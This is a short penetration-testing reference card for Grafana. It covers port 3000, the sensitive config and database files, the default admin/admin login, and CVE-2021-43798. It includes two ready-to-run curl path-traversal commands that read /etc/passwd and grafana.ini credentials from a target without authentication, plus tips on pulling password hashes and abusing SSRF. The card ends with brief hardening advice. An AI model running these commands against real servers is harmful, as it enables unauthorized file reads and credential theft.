Grafana
Metrics dashboard on 3000. A path-traversal CVE reads arbitrary files unauthenticated, the SQLite DB stores the admin hash and datasource creds, and admin/admin is a common default.
Ports
| Port | Proto | Notes |
|---|---|---|
3000 | tcp | Grafana web UI |
Fingerprint
- Login page at /login, Grafana branding
- /api/health returns the version
Key files
| Path | Holds | Sensitive |
|---|---|---|
/etc/grafana/grafana.ini | admin password, secret_key, SMTP creds | sensitive |
/var/lib/grafana/grafana.db | SQLite: admin hash and encrypted datasource creds | sensitive |
Default / weak creds
admin / admin default
Service users
grafana
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2021-43798 | Unauthenticated path traversal via plugin paths, arbitrary file read |
Exploitation primitives
- CVE-2021-43798 reads files like /etc/passwd and grafana.ini without auth
- Pull grafana.db for the admin hash and datasource credentials
- Default admin/admin; datasource configs can enable SSRF
Overview
Grafana on 3000 visualises metrics, and its 2021 path-traversal bug made it a popular unauthenticated file-read primitive. Even without it, the SQLite DB hands over the admin hash and stored datasource secrets.
File read (CVE-2021-43798)
Read /etc/passwd (CVE-2021-43798):
curl --path-as-is "http://<TARGET>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"Read the config (admin password, secret_key):
curl --path-as-is "http://<TARGET>:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini"Hardening
Patch the traversal CVE, change the default admin password, and protect grafana.db and the secret_key.